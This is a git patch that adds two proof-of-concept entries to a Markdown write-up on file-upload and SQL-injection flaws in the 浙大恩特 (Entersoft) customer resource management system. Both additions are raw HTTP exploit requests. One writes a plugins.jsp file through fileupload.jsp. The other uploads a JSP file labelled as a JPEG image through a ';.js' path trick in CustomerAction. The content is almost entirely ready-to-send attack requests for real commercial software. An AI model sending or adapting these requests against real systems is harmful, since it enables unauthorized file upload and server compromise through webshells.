From 448cd7b38deca39c0c99d65ce3ce2eae46282111 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Wed, 29 Nov 2023 19:00:58 +0800 Subject: [PATCH] =?UTF-8?q?Update=20=E6=B5=99=E5=A4=A7=E6=81=A9=E7=89=B9?= =?UTF-8?q?=E5=AE=A2=E6=88=B7=E8=B5=84=E6=BA=90=E7=AE=A1=E7=90=86=E7=B3=BB?= =?UTF-8?q?=E7=BB=9F=20=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0=E5=92=8Csql?= =?UTF-8?q?=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...客户资源管理系统 文件上传和sql注入漏洞.md | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) diff --git a/浙大恩特客户资源管理系统 文件上传和sql注入漏洞.md b/浙大恩特客户资源管理系统 文件上传和sql注入漏洞.md index 0d0ea4a..bf890f2 100644 --- a/浙大恩特客户资源管理系统 文件上传和sql注入漏洞.md +++ b/浙大恩特客户资源管理系统 文件上传和sql注入漏洞.md @@ -201,3 +201,40 @@ func exploit(t, s string) string { } ``` +## 文件上传3 +``` + +POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=plugins.jsp HTTP/1.1 +Host: xxxxxxxx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0 uacq +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 8 + +1111 +``` + +## 文件上传4 +``` + +POST /entsoft/CustomerAction.entphone;.js?method=loadFile HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0 uacq +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye8FPHsIAq9JN8j2A +Content-Length: 203 + +------WebKitFormBoundarye8FPHsIAq9JN8j2A +Content-Disposition: form-data; name="file";filename="as.jsp" +Content-Type: image/jpeg + +<%out.print("test");%> +------WebKitFormBoundarye8FPHsIAq9JN8j2A-- +```